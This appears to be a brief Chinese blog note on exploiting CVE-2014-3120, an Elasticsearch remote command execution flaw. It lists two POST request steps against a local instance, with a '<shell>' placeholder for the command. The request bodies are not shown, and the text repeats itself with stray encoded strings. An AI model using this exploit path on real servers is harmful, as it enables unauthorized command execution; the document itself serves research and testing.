【笔记】CVE-2014-3120漏洞利用
前言
Elasticsearch的RCE远程命令执行漏洞
exp
- 新增数据
随便新增一条数据,确保数据库中有数据即可
1 | POST http://127.0.0.1:9200/x |
- 远程命令执行
<shell>:远程执行的Shell命令
1 | POST http://127.0.0.1:9200/_search?pretty |
57uv6Z6g55qE5Y2a5a6i
MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究,请勿非法破坏,请遵守相关法律法规,后果自负
Elasticsearch的RCE远程命令执行漏洞
随便新增一条数据,确保数据库中有数据即可
1 | POST http://127.0.0.1:9200/x |
<shell>:远程执行的Shell命令
1 | POST http://127.0.0.1:9200/_search?pretty |